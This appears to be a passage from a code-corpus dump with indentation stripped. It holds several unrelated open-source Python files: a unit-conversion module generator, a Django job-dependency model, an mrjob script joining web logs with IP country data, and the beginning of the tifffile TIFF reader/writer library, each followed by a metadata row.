exec('x.%s = 1.0' % arg)
for line in repr(x).split('\n'):
s += '%s\n' % line
s += '\n'
return s
def build_doctest(modulename,testfilename):
"builds test file for testing %s.py based on table data" % (modulename)
s = 'building %s' % testfilename
s += '\n## **** %s Test ****\n' % (modulename)
s += 'from %s import *' % (modulename)
s += '"""'
for table in tables:
s += build_test(table)
return s
if __name__ == '__main__':
filename = 'conversion.py'
modulename = filename[:-3]
testfilename = modulename+'Test.txt'
print 'building', filename
fp = open(filename,'w')
s = build_module(tables, modulename)
print >>fp,s
fp.close()
from conversion import *
print 'building', testfilename
fp = open(testfilename,'w')
s = build_doctest(modulename,testfilename)
print >>fp,s
fp.close()
| mit | -1,155,592,190,145,512,700 | 41.354978 | 218 | 0.596944 | false |
ChrisCooper/pipeline-nanny | taskmaster/models.py | 1 | 3179 | from django.db import models
class JobGroup(models.Model):
name = models.TextField()
nanny_creation_date = models.DateTimeField('date created', auto_now_add=True)
def new_job(self, **args):
return Job.objects.create(group=self, **args)
def __repr__(self):
return "<Job group: {name} ({n_jobs} jobs)>".format(name=self.name, n_jobs=self.jobs.count())
def __str__(self):
return self.__repr__()
#def ready_jobs(self):
#return self.jobs.
class Job(models.Model):
name = models.TextField()
group = models.ForeignKey('JobGroup', related_name='jobs')
child_jobs = models.ManyToManyField('self', symmetrical=False, related_name='parent_jobs')
nanny_creation_date = models.DateTimeField('date created', auto_now_add=True)
command = models.TextField()
stdout_file_location = models.TextField()
stderr_file_location = models.TextField()
WAITING = 0
READY = 1
RUNNING = 2
COMPLETED = 3
ERRORED = 4
KILLED = 5
STATUSES = (
(WAITING, 'Waiting'), # waiting on parent jobs
(READY, 'Ready'), # Can be started any time
(RUNNING, 'Running'), # Has been started
(COMPLETED, 'Completed'), # Exited with zero code
(ERRORED, 'Errored-out'), # Exited with a non-zero status
(KILLED, 'Killed'), # Used too many resources and was killed
)
status = models.IntegerField(choices=STATUSES, default=READY)
def __repr__(self):
return "<{status} Job: {name}, {n_parents} parents, {n_children} children>".format(
status=self.get_status_display(),
name=self.name,
n_parents=self.parent_jobs.count(),
n_children=self.child_jobs.count())
def add_child(self, dependant_job):
if dependant_job == self:
raise InvalidDependencyException("Error: Can't add a job as its own child. Job is {0}".format(self))
if self.depends_on(dependant_job):
raise InvalidDependencyException("Error: Dependency loops are not allowed. {0} already depends on {1}".format(self, dependant_job))
if dependant_job in self.child_jobs.all():
raise InvalidDependencyException("Error: Child job has already been added. {1} already depends on {0}".format(self, dependant_job))
if self.status not in (Job.READY, Job.WAITING):
raise InvalidDependencyException("Error: Can't add a child to a parent job that's already started. {0} already running (child: {1})".format(self, dependant_job))
if dependant_job.status not in (Job.READY, Job.WAITING):
raise InvalidDependencyException("Error: Can't add a child job that's already started. {1} already running (parent: {0})".format(self, dependant_job))
self.child_jobs.add(dependant_job)
dependant_job.status = Job.WAITING
self.save()
dependant_job.save()
def add_parent(self, prerequisite_job):
prerequisite_job.add_child(self)
def add_parents(self, prerequisite_jobs):
for job in prerequisite_jobs:
self.add_parent(job)
def add_children(self, dependent_jobs):
for job in dependent_jobs:
self.add_child(job)
def depends_on(self, job):
if (job in self.parent_jobs.all()):
return True
for dependency in self.parent_jobs.all():
if dependency.depends_on(job):
return True
return False
class InvalidDependencyException(Exception):
pass
| mit | 4,321,678,611,756,257,300 | 34.322222 | 164 | 0.705253 | false |
explorerwjy/jw_anly502 | PS03/join3.py | 1 | 1856 | #!/usr/bin/env python2
# To get started with the join,
# try creating a new directory in HDFS that has both the fwiki data AND the maxmind data.
import mrjob
from mrjob.job import MRJob
from mrjob.step import MRStep
from weblog import Weblog # imports class defined in weblog.py
import os
import re
import heapq
class FwikiMaxmindJoin(MRJob):
def mapper(self, _, line):
# Is this a weblog file, or a MaxMind GeoLite2 file?
filename = mrjob.compat.jobconf_from_env("map.input.file")
if "top1000ips_to_country.txt" in filename:
self.increment_counter("Status","top1000_ips_to_country file found",1)
try:
(ipaddr, country) = line.strip().split("\t")
yield ipaddr, "+"+country
except ValueError as e:
pass
else:
try:
o = Weblog(line)
except ValueError:
sys.stderr.write("Invalid Logfile line :{}\n".format(line))
return
if o.wikipage() == "Main_Page":
yield o.ipaddr, line
def reducer(self, key, values):
country = None
for v in values:
if v[0:1] == '+':
country = v[1:]
continue
if not country:
self.increment_counter("Warning","No Country Found", 1)
continue
o = Weblog(v)
yield "Geolocated",[o.date,country,v]
def mapper2(self,key,value):
country = value[1]
#country=re.findall('\[\"([^\d."]+)\",',value)[0]
yield country,1
def reducer2(self,key,values):
yield key,sum(values)
def mapper3(self,key,value):
yield "TOP10",(value,key)
def reducer3(self,key,values):
for count in heapq.nlargest(10,values):
yield key,count
def steps(self):
return [
MRStep(mapper=self.mapper,reducer=self.reducer),
MRStep(mapper=self.mapper2,reducer=self.reducer2),
MRStep(mapper=self.mapper3,reducer=self.reducer3)
]
if __name__=="__main__":
FwikiMaxmindJoin.run()
| cc0-1.0 | 5,963,624,779,465,666,000 | 26.701493 | 89 | 0.651401 | false |
jni/cellom2tif | cellom2tif/tifffile.py | 1 | 173408 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# tifffile.py
# Copyright (c) 2008-2014, Christoph Gohlke
# Copyright (c) 2008-2014, The Regents of the University of California
# Produced at the Laboratory for Fluorescence Dynamics
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the copyright holders nor the names of any
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Read and write image data from and to TIFF files.
Image and metadata can be read from TIFF, BigTIFF, OME-TIFF, STK, LSM, NIH,
SGI, ImageJ, MicroManager, FluoView, SEQ and GEL files.
Only a subset of the TIFF specification is supported, mainly uncompressed
and losslessly compressed 2**(0 to 6) bit integer, 16, 32 and 64-bit float,
grayscale and RGB(A) images, which are commonly used in bio-scientific imaging.
Specifically, reading JPEG and CCITT compressed image data or EXIF, IPTC, GPS,
and XMP metadata is not implemented.
Only primary info records are read for STK, FluoView, MicroManager, and
NIH image formats.
TIFF, the Tagged Image File Format, is under the control of Adobe Systems.
BigTIFF allows for files greater than 4 GB. STK, LSM, FluoView, SGI, SEQ, GEL,
and OME-TIFF, are custom extensions defined by Molecular Devices (Universal
Imaging Corporation), Carl Zeiss MicroImaging, Olympus, Silicon Graphics
International, Media Cybernetics, Molecular Dynamics, and the Open Microscopy
Environment consortium respectively.
For command line usage run ``python tifffile.py --help``
:Author:
`Christoph Gohlke <http://www.lfd.uci.edu/~gohlke/>`_
:Organization:
Laboratory for Fluorescence Dynamics, University of California, Irvine
:Version: 2014.08.24
Requirements
------------
* `CPython 2.7 or 3.4 <http://www.python.org>`_
* `Numpy 1.8.2 <http://www.numpy.org>`_
* `Matplotlib 1.4 <http://www.matplotlib.org>`_ (optional for plotting)
* `Tifffile.c 2013.11.05 <http://www.lfd.uci.edu/~gohlke/>`_
(recommended for faster decoding of PackBits and LZW encoded strings)
Notes
-----
The API is not stable yet and might change between revisions.
Tested on little-endian platforms only.
Other Python packages and modules for reading bio-scientific TIFF files:
* `Imread <http://luispedro.org/software/imread>`_
* `PyLibTiff <http://code.google.com/p/pylibtiff>`_
* `SimpleITK <http://www.simpleitk.org>`_
* `PyLSM <https://launchpad.net/pylsm>`_
* `PyMca.TiffIO.py <http://pymca.sourceforge.net/>`_ (same as fabio.TiffIO)
* `BioImageXD.Readers <http://www.bioimagexd.net/>`_
* `Cellcognition.io <http://cellcognition.org/>`_
* `CellProfiler.bioformats
<https://github.com/CellProfiler/python-bioformats>`_
Acknowledgements
----------------
* Egor Zindy, University of Manchester, for cz_lsm_scan_info specifics.
* Wim Lewis for a bug fix and some read_cz_lsm functions.
* Hadrien Mary for help on reading MicroManager files.
References
----------
(1) TIFF 6.0 Specification and Supplements. Adobe Systems Incorporated.
http://partners.adobe.com/public/developer/tiff/
(2) TIFF File Format FAQ. http://www.awaresystems.be/imaging/tiff/faq.html
(3) MetaMorph Stack (STK) Image File Format.
http://support.meta.moleculardevices.com/docs/t10243.pdf
(4) Image File Format Description LSM 5/7 Release 6.0 (ZEN 2010).
Carl Zeiss MicroImaging GmbH. BioSciences. May 10, 2011
(5) File Format Description - LSM 5xx Release 2.0.
http://ibb.gsf.de/homepage/karsten.rodenacker/IDL/Lsmfile.doc
(6) The OME-TIFF format.
http://www.openmicroscopy.org/site/support/file-formats/ome-tiff
(7) UltraQuant(r) Version 6.0 for Windows Start-Up Guide.
http://www.ultralum.com/images%20ultralum/pdf/UQStart%20Up%20Guide.pdf
(8) Micro-Manager File Formats.
http://www.micro-manager.org/wiki/Micro-Manager_File_Formats
(9) Tags for TIFF and Related Specifications. Digital Preservation.
http://www.digitalpreservation.gov/formats/content/tiff_tags.shtml
Examples
--------
>>> data = numpy.random.rand(5, 301, 219)
>>> imsave('temp.tif', data)
>>> image = imread('temp.tif')
>>> numpy.testing.assert_array_equal(image, data)
>>> with TiffFile('temp.tif') as tif:
... images = tif.asarray()
... for page in tif:
... for tag in page.tags.values():
... t = tag.name, tag.value
... image = page.asarray()
"""
from __future__ import division, print_function
import sys
import os
import re
import glob
import math
import zlib
import time
import json
import struct
import warnings
import tempfile
import datetime
import collections
from fractions import Fraction
from xml.etree import cElementTree as etree
import numpy
try:
from . import _tifffile
except ImportError:
pass
__version__ = '0.3.3'
__docformat__ = 'restructuredtext en'
__all__ = ('imsave', 'imread', 'imshow', 'TiffFile', 'TiffWriter',
'TiffSequence')
def imsave(filename, data, **kwargs):
"""Write image data to TIFF file.
Refer to the TiffWriter class and member functions for documentation.
Parameters
----------
filename : str
Name of file to write.
data : array_like
Input image. The last dimensions are assumed to be image depth,
height, width, and samples.
kwargs : dict
Parameters 'byteorder', 'bigtiff', and 'software' are passed to
the TiffWriter class.
Parameters 'photometric', 'planarconfig', 'resolution',
'description', 'compress', 'volume', and 'extratags' are passed to
the TiffWriter.save function.
Examples
--------
>>> data = numpy.random.rand(2, 5, 3, 301, 219)
>>> description = '{"shape": %s}' % str(list(data.shape))
>>> imsave('temp.tif', data, compress=6,
... extratags=[(270, 's', 0, description, True)])
"""
tifargs = {}
for key in ('byteorder', 'bigtiff', 'software', 'writeshape'):
if key in kwargs:
tifargs[key] = kwargs[key]
del kwargs[key]
if 'writeshape' not in kwargs:
kwargs['writeshape'] = True
if 'bigtiff' not in tifargs and data.size*data.dtype.itemsize > 2000*2**20:
tifargs['bigtiff'] = True
with TiffWriter(filename, **tifargs) as tif:
tif.save(data, **kwargs)
class TiffWriter(object):
"""Write image data to TIFF file.
TiffWriter instances must be closed using the close method, which is
automatically called when using the 'with' statement.
Examples
--------
>>> data = numpy.random.rand(2, 5, 3, 301, 219)
>>> with TiffWriter('temp.tif', bigtiff=True) as tif:
... for i in range(data.shape[0]):
... tif.save(data[i], compress=6)
"""
TYPES = {'B': 1, 's': 2, 'H': 3, 'I': 4, '2I': 5, 'b': 6,
'h': 8, 'i': 9, 'f': 11, 'd': 12, 'Q': 16, 'q': 17}
TAGS = {
'new_subfile_type': 254, 'subfile_type': 255,
'image_width': 256, 'image_length': 257, 'bits_per_sample': 258,
'compression': 259, 'photometric': 262, 'fill_order': 266,
'document_name': 269, 'image_description': 270, 'strip_offsets': 273,
'orientation': 274, 'samples_per_pixel': 277, 'rows_per_strip': 278,
'strip_byte_counts': 279, 'x_resolution': 282, 'y_resolution': 283,
'planar_configuration': 284, 'page_name': 285, 'resolution_unit': 296,
'software': 305, 'datetime': 306, 'predictor': 317, 'color_map': 320,
'tile_width': 322, 'tile_length': 323, 'tile_offsets': 324,
'tile_byte_counts': 325, 'extra_samples': 338, 'sample_format': 339,
'image_depth': 32997, 'tile_depth': 32998}
def __init__(self, filename, bigtiff=False, byteorder=None,
software='tifffile.py'):
"""Create a new TIFF file for writing.
Use bigtiff=True when creating files greater than 2 GB.
Parameters
----------
filename : str
Name of file to write.
bigtiff : bool
If True, the BigTIFF format is used.
byteorder : {'<', '>'}
The endianness of the data in the file.
By default this is the system's native byte order.
software : str
Name of the software used to create the image.
Saved with the first page only.
"""
if byteorder not in (None, '<', '>'):
raise ValueError("invalid byteorder %s" % byteorder)
if byteorder is None:
byteorder = '<' if sys.byteorder == 'little' else '>'
self._byteorder = byteorder
self._software = software
self._fh = open(filename, 'wb')
self._fh.write({'<': b'II', '>': b'MM'}[byteorder])
if bigtiff:
self._bigtiff = True
self._offset_size = 8
self._tag_size = 20
self._numtag_format = 'Q'
self._offset_format = 'Q'
self._val_format = '8s'
self._fh.write(struct.pack(byteorder+'HHH', 43, 8, 0))
else:
self._bigtiff = False
self._offset_size = 4
self._tag_size = 12
self._numtag_format = 'H'
self._offset_format = 'I'
self._val_format = '4s'
self._fh.write(struct.pack(byteorder+'H', 42))
# first IFD
self._ifd_offset = self._fh.tell()
self._fh.write(struct.pack(byteorder+self._offset_format, 0))
def save(self, data, photometric=None, planarconfig=None, resolution=None,
description=None, volume=False, writeshape=False, compress=0,
extratags=()):
"""Write image data to TIFF file.
Image data are written in one stripe per plane.
Dimensions larger than 2 to 4 (depending on photometric mode, planar
configuration, and SGI mode) are flattened and saved as separate pages.
The 'sample_format' and 'bits_per_sample' TIFF tags are derived from
the data type.
Parameters
----------
data : array_like
Input image. The last dimensions are assumed to be image depth,
height, width, and samples.
photometric : {'minisblack', 'miniswhite', 'rgb'}
The color space of the image data.
By default this setting is inferred from the data shape.
planarconfig : {'contig', 'planar'}
Specifies if samples are stored contiguous or in separate planes.
By default this setting is inferred from the data shape.
'contig': last dimension contains samples.
'planar': third last dimension contains samples.
resolution : (float, float) or ((int, int), (int, int))
X and Y resolution in dots per inch as float or rational numbers.
description : str
The subject of the image. Saved with the first page only.
compress : int
Values from 0 to 9 controlling the level of zlib compression.
If 0, data are written uncompressed (default).
volume : bool
If True, volume data are stored in one tile (if applicable) using
the SGI image_depth and tile_depth tags.
Image width and depth must be multiple of 16.
Few software can read this format, e.g. MeVisLab.
writeshape : bool
If True, write the data shape to the image_description tag
if necessary and no other description is given.
extratags: sequence of tuples
Additional tags as [(code, dtype, count, value, writeonce)].
code : int
The TIFF tag Id.
dtype : str
Data type of items in 'value' in Python struct format.
One of B, s, H, I, 2I, b, h, i, f, d, Q, or q.
count : int
Number of data values. Not used for string values.
value : sequence
'Count' values compatible with 'dtype'.
writeonce : bool
If True, the tag is written to the first page only.
"""
if photometric not in (None, 'minisblack', 'miniswhite', 'rgb'):
raise ValueError("invalid photometric %s" % photometric)
if planarconfig not in (None, 'contig', 'planar'):
raise ValueError("invalid planarconfig %s" % planarconfig)
if not 0 <= compress <= 9:
raise ValueError("invalid compression level %s" % compress)
fh = self._fh
byteorder = self._byteorder
numtag_format = self._numtag_format
val_format = self._val_format
offset_format = self._offset_format
offset_size = self._offset_size
tag_size = self._tag_size
data = numpy.asarray(data, dtype=byteorder+data.dtype.char, order='C')
data_shape = shape = data.shape
data = numpy.atleast_2d(data)
# normalize shape of data
samplesperpixel = 1
extrasamples = 0
if volume and data.ndim < 3:
volume = False
if photometric is None:
if planarconfig:
photometric = 'rgb'
elif data.ndim > 2 and shape[-1] in (3, 4):
photometric = 'rgb'
elif volume and data.ndim > 3 and shape[-4] in (3, 4):
photometric = 'rgb'
elif data.ndim > 2 and shape[-3] in (3, 4):
photometric = 'rgb'
else:
photometric = 'minisblack'
if planarconfig and len(shape) <= (3 if volume else 2):
planarconfig = None
photometric = 'minisblack'
if photometric == 'rgb':
if len(shape) < 3:
raise ValueError("not a RGB(A) image")
if len(shape) < 4:
volume = False
if planarconfig is None:
if shape[-1] in (3, 4):
planarconfig = 'contig'
elif shape[-4 if volume else -3] in (3, 4):
planarconfig = 'planar'
elif shape[-1] > shape[-4 if volume else -3]:
planarconfig = 'planar'
else:
planarconfig = 'contig'
if planarconfig == 'contig':
data = data.reshape((-1, 1) + shape[(-4 if volume else -3):])
samplesperpixel = data.shape[-1]
else:
data = data.reshape(
(-1,) + shape[(-4 if volume else -3):] + (1,))
samplesperpixel = data.shape[1]
if samplesperpixel > 3:
extrasamples = samplesperpixel - 3
elif planarconfig and len(shape) > (3 if volume else 2):
if planarconfig == 'contig':
data = data.reshape((-1, 1) + shape[(-4 if volume else -3):])
samplesperpixel = data.shape[-1]
else:
data = data.reshape(
(-1,) + shape[(-4 if volume else -3):] + (1,))
samplesperpixel = data.shape[1]
extrasamples = samplesperpixel - 1
else:
planarconfig = None
# remove trailing 1s
while len(shape) > 2 and shape[-1] == 1:
shape = shape[:-1]
if len(shape) < 3:
volume = False
if False and (
len(shape) > (3 if volume else 2) and shape[-1] < 5 and
all(shape[-1] < i
for i in shape[(-4 if volume else -3):-1])):
# DISABLED: non-standard TIFF, e.g. (220, 320, 2)
planarconfig = 'contig'
samplesperpixel = shape[-1]
data = data.reshape((-1, 1) + shape[(-4 if volume else -3):])
else:
data = data.reshape(
(-1, 1) + shape[(-3 if volume else -2):] + (1,))
if samplesperpixel == 2:
warnings.warn("writing non-standard TIFF (samplesperpixel 2)")
if volume and (data.shape[-2] % 16 or data.shape[-3] % 16):
warnings.warn("volume width or length are not multiple of 16")
volume = False
data = numpy.swapaxes(data, 1, 2)
data = data.reshape(
(data.shape[0] * data.shape[1],) + data.shape[2:])
# data.shape is now normalized 5D or 6D, depending on volume
# (pages, planar_samples, (depth,) height, width, contig_samples)
assert len(data.shape) in (5, 6)
shape = data.shape
bytestr = bytes if sys.version[0] == '2' else (
lambda x: bytes(x, 'utf-8') if isinstance(x, str) else x)
tags = [] # list of (code, ifdentry, ifdvalue, writeonce)
if volume:
# use tiles to save volume data
tag_byte_counts = TiffWriter.TAGS['tile_byte_counts']
tag_offsets = TiffWriter.TAGS['tile_offsets']
else:
# else use strips
tag_byte_counts = TiffWriter.TAGS['strip_byte_counts']
tag_offsets = TiffWriter.TAGS['strip_offsets']
def pack(fmt, *val):
return struct.pack(byteorder+fmt, *val)
def addtag(code, dtype, count, value, writeonce=False):
# Compute ifdentry & ifdvalue bytes from code, dtype, count, value.
# Append (code, ifdentry, ifdvalue, writeonce) to tags list.
code = int(TiffWriter.TAGS.get(code, code))
try:
tifftype = TiffWriter.TYPES[dtype]
except KeyError:
raise ValueError("unknown dtype %s" % dtype)
rawcount = count
if dtype == 's':
value = bytestr(value) + b'\0'
count = rawcount = len(value)
value = (value, )
if len(dtype) > 1:
count *= int(dtype[:-1])
dtype = dtype[-1]
ifdentry = [pack('HH', code, tifftype),
pack(offset_format, rawcount)]
ifdvalue = None
if count == 1:
if isinstance(value, (tuple, list)):
value = value[0]
ifdentry.append(pack(val_format, pack(dtype, value)))
elif struct.calcsize(dtype) * count <= offset_size:
ifdentry.append(pack(val_format,
pack(str(count)+dtype, *value)))
else:
ifdentry.append(pack(offset_format, 0))
ifdvalue = pack(str(count)+dtype, *value)
tags.append((code, b''.join(ifdentry), ifdvalue, writeonce))
def rational(arg, max_denominator=1000000):
# return nominator and denominator from float or two integers
try:
f = Fraction.from_float(arg)
except TypeError:
f = Fraction(arg[0], arg[1])
f = f.limit_denominator(max_denominator)
return f.numerator, f.denominator
if self._software:
addtag('software', 's', 0, self._software, writeonce=True)
self._software = None # only save to first page
if description:
addtag('image_description', 's', 0, description, writeonce=True)
elif writeshape and shape[0] > 1 and shape != data_shape:
addtag('image_description', 's', 0,
"shape=(%s)" % (",".join('%i' % i for i in data_shape)),
writeonce=True)
addtag('datetime', 's', 0,
datetime.datetime.now().strftime("%Y:%m:%d %H:%M:%S"),
writeonce=True)
addtag('compression', 'H', 1, 32946 if compress else 1)
addtag('orientation', 'H', 1, 1)
addtag('image_width', 'I', 1, shape[-2])
addtag('image_length', 'I', 1, shape[-3])
if volume:
addtag('image_depth', 'I', 1, shape[-4])
addtag('tile_depth', 'I', 1, shape[-4])
addtag('tile_width', 'I', 1, shape[-2])
addtag('tile_length', 'I', 1, shape[-3])
addtag('new_subfile_type', 'I', 1, 0 if shape[0] == 1 else 2)
addtag('sample_format', 'H', 1,
{'u': 1, 'i': 2, 'f': 3, 'c': 6}[data.dtype.kind])
addtag('photometric', 'H', 1,
{'miniswhite': 0, 'minisblack': 1, 'rgb': 2}[photometric])
addtag('samples_per_pixel', 'H', 1, samplesperpixel)
if planarconfig and samplesperpixel > 1:
addtag('planar_configuration', 'H', 1, 1
if planarconfig == 'contig' else 2)
addtag('bits_per_sample', 'H', samplesperpixel,
(data.dtype.itemsize * 8, ) * samplesperpixel)
else:
addtag('bits_per_sample', 'H', 1, data.dtype.itemsize * 8)
if extrasamples:
if photometric == 'rgb' and extrasamples == 1:
addtag('extra_samples', 'H', 1, 1) # associated alpha channel
else:
addtag('extra_samples', 'H', extrasamples, (0,) * extrasamples)
if resolution:
addtag('x_resolution', '2I', 1, rational(resolution[0]))
addtag('y_resolution', '2I', 1, rational(resolution[1]))
addtag('resolution_unit', 'H', 1, 2)
addtag('rows_per_strip', 'I', 1,
shape[-3] * (shape[-4] if volume else 1))
# use one strip or tile per plane
strip_byte_counts = (data[0, 0].size * data.dtype.itemsize,) * shape[1]
addtag(tag_byte_counts, offset_format, shape[1], strip_byte_counts)
addtag(tag_offsets, offset_format, shape[1], (0, ) * shape[1])
# add extra tags from users
for t in extratags:
addtag(*t)
# the entries in an IFD must be sorted in ascending order by tag code
tags = sorted(tags, key=lambda x: x[0])
if not self._bigtiff and (fh.tell() + data.size*data.dtype.itemsize
> 2**31-1):
raise ValueError("data too large for non-bigtiff file")
for pageindex in range(shape[0]):
# update pointer at ifd_offset
pos = fh.tell()
fh.seek(self._ifd_offset)
fh.write(pack(offset_format, pos))
fh.seek(pos)
# write ifdentries
fh.write(pack(numtag_format, len(tags)))
tag_offset = fh.tell()
fh.write(b''.join(t[1] for t in tags))
self._ifd_offset = fh.tell()
fh.write(pack(offset_format, 0)) # offset to next IFD
# write tag values and patch offsets in ifdentries, if necessary
for tagindex, tag in enumerate(tags):
if tag[2]:
pos = fh.tell()
fh.seek(tag_offset + tagindex*tag_size + offset_size + 4)
fh.write(pack(offset_format, pos))
fh.seek(pos)
if tag[0] == tag_offsets:
strip_offsets_offset = pos
elif tag[0] == tag_byte_counts:
strip_byte_counts_offset = pos
fh.write(tag[2])
# write image data
data_offset = fh.tell()
if compress:
strip_byte_counts = []
for plane in data[pageindex]:
plane = zlib.compress(plane, compress)
strip_byte_counts.append(len(plane))
fh.write(plane)
else:
# if this fails try update Python/numpy
data[pageindex].tofile(fh)
fh.flush()
# update strip and tile offsets and byte_counts if necessary
pos = fh.tell()
for tagindex, tag in enumerate(tags):
if tag[0] == tag_offsets: # strip or tile offsets
if tag[2]:
fh.seek(strip_offsets_offset)
strip_offset = data_offset
for size in strip_byte_counts:
fh.write(pack(offset_format, strip_offset))
strip_offset += size
else:
fh.seek(tag_offset + tagindex*tag_size +
offset_size + 4)
fh.write(pack(offset_format, data_offset))
elif tag[0] == tag_byte_counts: # strip or tile byte_counts
if compress:
if tag[2]:
fh.seek(strip_byte_counts_offset)
for size in strip_byte_counts:
fh.write(pack(offset_format, size))
else:
fh.seek(tag_offset + tagindex*tag_size +
offset_size + 4)
fh.write(pack(offset_format, strip_byte_counts[0]))
break
fh.seek(pos)
fh.flush()
# remove tags that should be written only once
if pageindex == 0:
tags = [t for t in tags if not t[-1]]
def close(self):
self._fh.close()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
self.close()
def imread(files, **kwargs):
"""Return image data from TIFF file(s) as numpy array.
The first image series is returned if no arguments are provided.
Parameters
----------
files : str or list
File name, glob pattern, or list of file names.
key : int, slice, or sequence of page indices
Defines which pages to return as array.
series : int
Defines which series of pages in file to return as array.
multifile : bool
If True (default), OME-TIFF data may include pages from multiple files.
pattern : str
Regular expression pattern that matches axes names and indices in
file names.
kwargs : dict
Additional parameters passed to the TiffFile or TiffSequence asarray
function.
Examples
--------
>>> im = imread('temp.tif', key=0)
>>> im.shape
(3, 301, 219)
>>> ims = imread(['temp.tif', 'temp.tif'])
>>> ims.shape
(2, 10, 3, 301, 219)
"""
kwargs_file = {}
if 'multifile' in kwargs:
kwargs_file['multifile'] = kwargs['multifile']
del kwargs['multifile']
else:
kwargs_file['multifile'] = True
kwargs_seq = {}
if 'pattern' in kwargs:
kwargs_seq['pattern'] = kwargs['pattern']
del kwargs['pattern']
if isinstance(files, basestring) and any(i in files for i in '?*'):
files = glob.glob(files)
if not files:
raise ValueError('no files found')
if len(files) == 1:
files = files[0]
if isinstance(files, basestring):
with TiffFile(files, **kwargs_file) as tif:
return tif.asarray(**kwargs)
else:
with TiffSequence(files, **kwargs_seq) as imseq:
return imseq.asarray(**kwargs)
class lazyattr(object):
"""Lazy object attribute whose value is computed on first access."""
__slots__ = ('func', )
def __init__(self, func):
self.func = func
def __get__(self, instance, owner):
if instance is None:
return self
value = self.func(instance)
if value is NotImplemented:
return getattr(super(owner, instance), self.func.__name__)
setattr(instance, self.func.__name__, value)
return value
class TiffFile(object):
"""Read image and metadata from TIFF, STK, LSM, and FluoView files.
TiffFile instances must be closed using the close method, which is
automatically called when using the 'with' statement.
Attributes
----------
pages : list
All TIFF pages in file.
series : list of Records(shape, dtype, axes, TiffPages)
TIFF pages with compatible shapes and types.
micromanager_metadata: dict
Extra MicroManager non-TIFF metadata in the file, if exists.
All attributes are read-only.
Examples
--------
>>> with TiffFile('temp.tif') as tif:
... data = tif.asarray()
... data.shape
(5, 301, 219)
"""
def __init__(self, arg, name=None, offset=None, size=None,
multifile=True, multifile_close=True):
"""Initialize instance from file.
Parameters
----------
arg : str or open file
Name of file or open file object.
The file objects are closed in TiffFile.close().
name : str
Optional name of file in case 'arg' is a file handle.
offset : int
Optional start position of embedded file. By default this is
the current file position.
size : int
Optional size of embedded file. By default this is the number
of bytes from the 'offset' to the end of the file.
multifile : bool
If True (default), series may include pages from multiple files.
Currently applies to OME-TIFF only.
multifile_close : bool
If True (default), keep the handles of other files in multifile
series closed. This is inefficient when few files refer to
many pages. If False, the C runtime may run out of resources.
"""
self._fh = FileHandle(arg, name=name, offset=offset, size=size)
self.offset_size = None
self.pages = []
self._multifile = bool(multifile)
self._multifile_close = bool(multifile_close)
self._files = {self._fh.name: self} # cache of TiffFiles
try:
self._fromfile()
except Exception:
self._fh.close()
raise
@property
def filehandle(self):
"""Return file handle."""
return self._fh
@property
def filename(self):
"""Return name of file handle."""
return self._fh.name
def close(self):
"""Close open file handle(s)."""
for tif in self._files.values():
tif._fh.close()
self._files = {}
def _fromfile(self):
"""Read TIFF header and all page records from file."""
self._fh.seek(0)
try:
self.byteorder = {b'II': '<', b'MM': '>'}[self._fh.read(2)]
except KeyError:
raise ValueError("not a valid TIFF file")
version = struct.unpack(self.byteorder+'H', self._fh.read(2))[0]
if version == 43: # BigTiff
self.offset_size, zero = struct.unpack(self.byteorder+'HH',
self._fh.read(4))
if zero or self.offset_size != 8:
raise ValueError("not a valid BigTIFF file")
elif version == 42:
self.offset_size = 4
else:
raise ValueError("not a TIFF file")
self.pages = []
while True:
try:
page = TiffPage(self)
self.pages.append(page)
except StopIteration:
break
if not self.pages:
raise ValueError("empty TIFF file")
if self.is_micromanager:
# MicroManager files contain metadata not stored in TIFF tags.
self.micromanager_metadata = read_micromanager_metadata(self._fh)
if self.is_lsm:
self._fix_lsm_strip_offsets()
self._fix_lsm_strip_byte_counts()
def _fix_lsm_strip_offsets(self):
"""Unwrap strip offsets for LSM files greater than 4 GB."""
for series in self.series:
wrap = 0
previous_offset = 0
for page in series.pages:
strip_offsets = []
for current_offset in page.strip_offsets:
if current_offset < previous_offset:
wrap += 2**32
strip_offsets.append(current_offset + wrap)
previous_offset = current_offset
page.strip_offsets = tuple(strip_offsets)
def _fix_lsm_strip_byte_counts(self):
"""Set strip_byte_counts to size of compressed data.
The strip_byte_counts tag in LSM files contains the number of bytes
for the uncompressed data.
"""
if not self.pages:
return
strips = {}
for page in self.pages:
assert len(page.strip_offsets) == len(page.strip_byte_counts)
for offset, bytecount in zip(page.strip_offsets,
page.strip_byte_counts):
strips[offset] = bytecount
offsets = sorted(strips.keys())
offsets.append(min(offsets[-1] + strips[offsets[-1]], self._fh.size))
for i, offset in enumerate(offsets[:-1]):
strips[offset] = min(strips[offset], offsets[i+1] - offset)
for page in self.pages:
if page.compression:
page.strip_byte_counts = tuple(
strips[offset] for offset in page.strip_offsets)
@lazyattr
def series(self):
"""Return series of TiffPage with compatible shape and properties."""
if not self.pages:
return []
series = []
page0 = self.pages[0]
if self.is_ome:
series = self._omeseries()
elif self.is_fluoview:
